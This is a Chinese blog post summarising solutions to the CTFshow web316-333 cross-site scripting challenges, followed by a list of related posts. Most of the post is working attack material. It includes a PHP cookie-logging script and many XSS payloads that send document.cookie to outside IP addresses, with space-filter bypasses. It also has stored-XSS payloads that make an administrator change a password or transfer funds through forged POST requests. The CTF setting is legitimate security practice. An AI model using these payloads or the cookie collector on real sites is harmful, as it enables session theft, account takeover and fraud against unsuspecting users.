xss总结

已于 2023-05-01 12:52:49 修改
阅读量82 收藏
点赞数
文章标签: xss php dreamweaver
于 2023-05-01 11:09:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48427966/article/details/130454365
版权

web316-320 各种基础姿势和绕过

# a.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
vps http://101.42.23.134/
-------------------------
<script>
var img=document.createElement("img"); img.src="http://101.42.23.134/a.php?cookie="+document.cookie;
</script>
-------------------------
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
-------------------------
<script>window.location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<script>location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<input onfocus="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)" autofocus>
-------------------------
<svg onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
-------------------------
<iframe onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
--------------------------
<body onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">

web321 -322过滤了空格

<iframe/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>

web323

<body/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">

web324-325

<body/**/onload="window.open('http://101.42.23.134/a.php?cookie='+document.cookie)">

web328

<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
在这个界面把x到的cookie打过去。
通过注册一个没有过滤密码的用户,进行了js执行,然后冒充管理员,进行获取flag

 web329

在下面这个界面,把下面js代码打过去
<script>window.open('http://101.42.23.134/a.php?cookie='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

 

 web330

用户名注册,强迫管理员修改账号和密码,在用户名那里X
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>
用管理员登录,admin

 web331

登录方式编程POST,注册方式也发生改变

<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/change.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('p=123456');</script>
用admin登录

 web332

给admin  转账-10000

web333

两种方法
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/amount.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('u=123&a=10000');</script>
-----------------------
自己给自己转账,指数增长,不得超过当前余额,预计15次左右即可

weixin_48427966
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
XSS总结
mingyqf的博客
04-09 837
转至:https://xz.aliyun.com/t/4067 By七友 / 2019-02-16 09:42:00 / 浏览数 38056 安全技术 WEB安全[顶(6)](javascript:) [踩(1)](javascript:) 简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的
Xss总结
code_lab
06-13 729
1. 什么都没过滤的入门情况< script>alert(1)< /script>(练习时去掉空格) < img src=”XXXX”> < img src=1 onerror=alert(1);> 2. 输出在< script>< /script>之间的情况1.< /script>< script>XXX 2.针对输出在不同的场景,进行合适的过滤。 3. 输出在HTML属性里的情况有时候,输
XSS知识总结
qq_43842093的博客
11-07 6750
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
DVWA XSS总结
iO快到碗里来
08-28 550
DVWA XSS(Reflected) low 未进行过滤,构造payload:<script>alert("x");</script> medium 过滤规则:把< script>用str_replace()函数替换为空。 尝试双写<script>标签:<sc<script>ript>alert("x");</sc</script>ript>--> 发现返回hello ript>:问题很奇怪,查看
XSS简单总结
Aiwin的博客
07-11 936
XSS的简单总结
XSS总结(含绕过)
weixin_50464560的博客
07-28 901
XSS总结 By七友 / 2019-02-16 09:42:00 / 浏览数 35528 <span class="content-...
XSS跨站总结
02-09
一篇文档,让你理解XSS跨站攻防的来龙去脉
32个触发事件XSS语句的总结
04-01
32个触发事件XSS语句的总结,新人学习xss必看!
xss-vuln学习通关总结
08-24
个人总结类文档。
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
02-XSS渗透测试步骤
tianxiadiiw的博客
05-06 247
存储型又叫永久性xss,常见于留言板,因为存储型xss的页面会将用户输入的内容存入到数据库内,反射型xss是一次性的,而且比较容易被发现,通常恶意链接会被修改成短链接,或钓鱼图片的形式。输入后和原有的前端代码产生混淆,形成新的页面语句,并且新的页面语句能够被浏览器解析并输出。所以其他人每访问一次的时候,服务器都会从数据库将攻击者输入的内容调取到前端浏览器解析,xss原理就是开发者没有对输入内容进行过滤,导致通过攻击者进行构造的前端代码,3)查看输出位置的内容与输入内容之间的关系,构建闭合和拼接脚本。
一个5000刀的XSS
2401_84434570的博客
05-03 408
背景介绍今天分享国外一个白帽小哥Crypto通过发现Apple某网站XSS而获得5000美元赏金的故事。废话不多说,让我们开始吧~
01-xss基本原理
tianxiadiiw的博客
05-06 468
/ 将数据保存起来,文件或数据库 // 让他直接跳转到真实的网站 echo "<script>location.href='https://www.taobao.com';xss全程为:Cross site scripting,指跨站攻击脚本,XSS漏洞发生在前端,攻击的是浏览器的解析引擎,xss也算是注入类的漏洞,JavaScript的代码注入,所以xss漏洞更主要是去攻击系统用户,而不是系统本身。XSS是以Web站点用户为攻击目标,而不是服务器,所以是一种钓鱼攻击,攻击目标是不确定的。
php利用阿里云短信SDK实现短信发送功能
赛时科技
05-02 1047
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
框架漏洞RCE-1
x88125E的博客
05-01 1071
前置知识,thinkphp5.0.23漏洞
如何根据IP获取国家省份城市名称PHP免费版
最新发布
大力水手z博客
05-06 379
如何根据IP获取国家省份城市名称PHP免费版
【Web】CTFSHOW 新手杯 题解
uuzeray的博客
05-02 424
先本地起个服务,先直接请求,再请求?name=Z3r4y,拿到new_rookie_info和Z3r4y_info。对比一下,其实就是要让I3为I1就可,sb后的.起到截断作用,id在name之后,name是我们可控的。$secret为$_COOKIE[secret],直接引用绕过了。可以在/change路由进行打入,用newname替换name。打PHP_SESSION_UPLOAD_PROGRESS。运行结果插到cookie里,而后便可为所欲为。当id为0时可以拿到flag。令mode为0看到源码。
xss漏洞 pikachu
08-13
在文章中引用的内容提到了关于Pikachu靶场的XSS漏洞学习总结和详解。Pikachu靶场是一个针对XSS漏洞进行训练和测试的平台,它提供了不同级别和类型的XSS漏洞供用户学习和实践。文章中列举了许多关卡,涵盖了反射型XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值